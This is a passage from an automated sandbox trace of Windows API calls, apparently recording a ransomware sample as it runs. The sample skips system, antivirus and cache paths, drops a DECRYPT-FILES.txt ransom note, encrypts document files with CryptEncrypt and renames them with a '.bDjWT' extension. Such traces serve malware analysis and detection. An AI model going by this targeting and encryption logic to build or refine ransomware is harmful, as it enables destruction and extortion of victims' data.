lstrcmpW (lpString1="L4RiddZbkkAp", lpString2="..") returned 1 [0084.637] lstrcatW (in: lpString1="L4RiddZbkkAp", lpString2="\\" | out: lpString1="L4RiddZbkkAp\\") returned="L4RiddZbkkAp\\" [0084.637] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Program Files") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch=":\\Windows") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Games\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\All Users") returned 0x0 [0084.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.638] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.638] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.638] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="AhnLab") returned 0x0 [0084.638] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.638] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.638] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.638] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\jkbimi8.tmp") returned 82 [0084.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0084.638] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.638] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.638] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\DECRYPT-FILES.txt") returned 88 [0084.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0084.638] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0084.639] CloseHandle (hObject=0x42c) returned 1 [0084.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.639] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*" [0084.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xaea44dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea44dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0084.640] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.640] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xaea44dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea44dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.640] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.640] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.640] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5947a150, ftCreationTime.dwHighDateTime=0x1d4cc7a, ftLastAccessTime.dwLowDateTime=0x249f1a10, ftLastAccessTime.dwHighDateTime=0x1d4c7e2, ftLastWriteTime.dwLowDateTime=0x249f1a10, ftLastWriteTime.dwHighDateTime=0x1d4c7e2, nFileSizeHigh=0x0, nFileSizeLow=0x1049, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bp7D8ssZyaPUB.odt", cAlternateFileName="BP7D8S~1.ODT")) returned 1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="DECRYPT-FILES.txt") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="autorun.inf") returned 1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="boot.ini") returned 1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="desktop.ini") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="ntuser.dat") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="iconcache.db") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="bootsect.bak") returned 1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="ntuser.dat.log") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="thumbs.db") returned -1 [0084.640] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt", lpString2="Bootfont.bin") returned 1 [0084.640] lstrlenW (lpString="Bp7D8ssZyaPUB.odt") returned 17 [0084.640] lstrcmpiW (lpString1="odt", lpString2="lnk") returned 1 [0084.640] lstrcmpiW (lpString1="odt", lpString2="exe") returned 1 [0084.640] lstrcmpiW (lpString1="odt", lpString2="sys") returned -1 [0084.640] lstrcmpiW (lpString1="odt", lpString2="dll") returned 1 [0084.640] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.640] lstrlenW (lpString="Bp7D8ssZyaPUB.odt") returned 17 [0084.640] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0084.640] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="Bp7D8ssZyaPUB.odt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt" [0084.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\bp7d8sszyapub.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.641] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=4169) returned 1 [0084.641] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.641] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.641] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.641] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.641] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.642] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.642] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.643] CloseHandle (hObject=0x0) returned 0 [0084.643] CloseHandle (hObject=0x438) returned 1 [0084.643] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.643] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt") returned 87 [0084.643] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt.bDjWT") returned 93 [0084.643] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\bp7d8sszyapub.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\bp7d8sszyapub.odt.bdjwt"), dwFlags=0x0) returned 1 [0084.644] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.644] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea44dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaea44dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea44dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.644] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.644] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.644] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.644] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.644] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.644] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.644] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.644] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0084.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\jkbimi8.tmp" [0084.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.645] CloseHandle (hObject=0x0) returned 0 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="DECRYPT-FILES.txt") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="autorun.inf") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="boot.ini") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="desktop.ini") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="ntuser.dat") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="iconcache.db") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="bootsect.bak") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="ntuser.dat.log") returned 1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="thumbs.db") returned -1 [0084.645] lstrcmpiW (lpString1="Osv2.doc", lpString2="Bootfont.bin") returned 1 [0084.645] lstrlenW (lpString="Osv2.doc") returned 8 [0084.645] lstrcmpiW (lpString1="doc", lpString2="lnk") returned -1 [0084.645] lstrcmpiW (lpString1="doc", lpString2="exe") returned -1 [0084.645] lstrcmpiW (lpString1="doc", lpString2="sys") returned -1 [0084.645] lstrcmpiW (lpString1="doc", lpString2="dll") returned 1 [0084.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.645] lstrlenW (lpString="Osv2.doc") returned 8 [0084.645] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0084.645] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="Osv2.doc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc" [0084.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\osv2.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.645] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=91969) returned 1 [0084.645] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.645] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.646] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.646] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.646] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.648] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.648] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.649] CloseHandle (hObject=0x0) returned 0 [0084.649] CloseHandle (hObject=0x438) returned 1 [0084.649] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.649] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.649] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc") returned 78 [0084.649] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc.bDjWT") returned 84 [0084.649] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\osv2.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\osv2.doc.bdjwt"), dwFlags=0x0) returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="DECRYPT-FILES.txt") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="autorun.inf") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="boot.ini") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="desktop.ini") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="ntuser.dat") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="iconcache.db") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="bootsect.bak") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="ntuser.dat.log") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="thumbs.db") returned 1 [0084.650] lstrcmpiW (lpString1="zpuJN1WAt0WkY.doc", lpString2="Bootfont.bin") returned 1 [0084.650] lstrlenW (lpString="zpuJN1WAt0WkY.doc") returned 17 [0084.650] lstrcmpiW (lpString1="doc", lpString2="lnk") returned -1 [0084.650] lstrcmpiW (lpString1="doc", lpString2="exe") returned -1 [0084.650] lstrcmpiW (lpString1="doc", lpString2="sys") returned -1 [0084.650] lstrcmpiW (lpString1="doc", lpString2="dll") returned 1 [0084.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0084.650] lstrlenW (lpString="zpuJN1WAt0WkY.doc") returned 17 [0084.651] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0084.651] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="zpuJN1WAt0WkY.doc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc" [0084.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\zpuJN1WAt0WkY.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\zpujn1wat0wky.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.651] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=79137) returned 1 [0084.651] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.651] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.651] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.651] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, 